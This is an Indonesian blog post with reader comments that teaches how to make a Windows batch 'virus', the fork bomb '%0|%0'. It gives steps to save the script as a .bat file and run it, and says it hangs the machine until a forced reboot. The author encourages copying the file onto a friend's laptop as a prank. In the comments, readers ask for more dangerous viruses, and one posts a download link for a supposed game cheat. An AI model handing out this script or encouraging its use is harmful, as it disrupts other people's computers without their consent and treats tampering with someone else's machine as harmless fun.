Cara Praktis Membuat Virus Komputer Sederhana


Siang ini, kota Salatiga kembali diguyur hujan yang turun dengan derasnya, membuat mata ini semakin tidak bisa diajak kompromi untuk bangun dari ranjang mimpi. Tapi api semangat harus lebih kuat daripada malasnya. Bertemu lagi dengan saya dalam postingan yang terbaru. Kali ini saya akan membahas sedikit Tips dalam dunia komputer, tentang cara membuat Virus. Saya sendiri tidak tahu ini termasuk postingan positif atau negatif, tergantung orang yang menggunakannya.

Cara membuat virus komputer/laptop (Guru Pantura)

Langsung aja ya, saya akan share pada kawan-kawan semua cara membuat virus komputer yang masih dalam level sangat sederhana. Nama virusnya Fork bomb, Fork Bomb adalah sebuah deretan script programming, yang membuat suatu proses pada command prompt berjalan terus-menerus hingga menghabiskan resource CPU, dan memory komputer.
Berikut ini langkah Sederhana untuk membuat virus Fork Bomb:
1. Buka Notepad dan ketik atau copy script berikut “%0|%0” (Buang tanda kutipnya).
 
2. Save file dengan nama bebas terserah temen", tapi harus berekstensi .bat, Sebagai contoh (nama virus.bat).

Untuk menjalankan File .bat yang kamu buat agar aktif, klik saja 2x pada filenya. Untuk menghentikan virus ini, mungkin kamu harus reboot paksa PC kamu untuk mengembalikannya ke kondisi normal. Menjalankan fork bomb ini akan menyebabkan kemacetan total CPU. Komputer kamu akan membuka sekitar 500 proses command prompt baru. CPU kamu akan kelebihan beban dan akan hang.
Tenang saja virus ini masih tergolong jinak kok, tadi saya sendiri juga sudah mencoba membuatnya dan menjalankannya di komputer pribadi. Alhasil setelah saya klik 2x, muncullah command prompt yang terus berjalan dan membuat PC saya hang total, terpaksa saya reboot secara manual dan PC pun kembali normal.
Kalo kamu mau iseng ngerjain PC ataupun Laptop temen kamu, copy saja file tersebut pada Laptopnya!

16 komentar:

  1. boleh tahu apa arti kode “%0|%0” itu?

    BalasHapus
  2. Ora reti brow...hahahhahahag
    Kayak'e script nggo memanggil command prompt pd kompi secara illegal (versi saya) :D

    BalasHapus
  3. masih newbi gan hehehehe ga nrti juga mohon bimbingannya membuat virus

    BalasHapus
  4. whahahahaha
    gua dah buat link download
    ghahaha
    gua buat cheat lost saga
    http://www.4shared.com/get/03SL-bab/No_Delay.html
    ghahaha
    thanks

    BalasHapus
  5. kalau virus yang buat komputer bisa otomatis ngirim email ada gak gan?
    thanks,,,,,,,,,,,,,,,,,
    mbahkakung25.blogspot.com

    BalasHapus
  6. eh gimana biar komputer g reboot lagi tolong kirimin ke nope ini 085691166555

    BalasHapus
  7. eh gimana biar komputer g reboot lagi tolong kirimin ke nope ini 085691166555

    BalasHapus
  8. bro kalo virus nya di cut lalu di masukin flas disk. lalu di cut lagi masukin ke pc masih aktif engak virus nya...bro..

    BalasHapus
  9. Balasan
    1. Iya pak, ini sebenarnya hanya perintah untuk memanggil command prompt secara terus menerus sampai komputer hang,

      salam,

      Hapus
  10. Balasan
    1. Silahkan pak :) Jangan lupa sertakan asal referensinya (sumbernya)...

      Kalau tidak salah artikelnya pada link ini ya :
      http://aripasola-community.blogspot.com/2012/11/cara-praktis-membuat-virus-komputer.html

      Hapus
  11. ada gak cara buat virus yg lebih berbahaya dari fork bomb ??

    BalasHapus
  12. virus nya siip bangen gan...........

    BalasHapus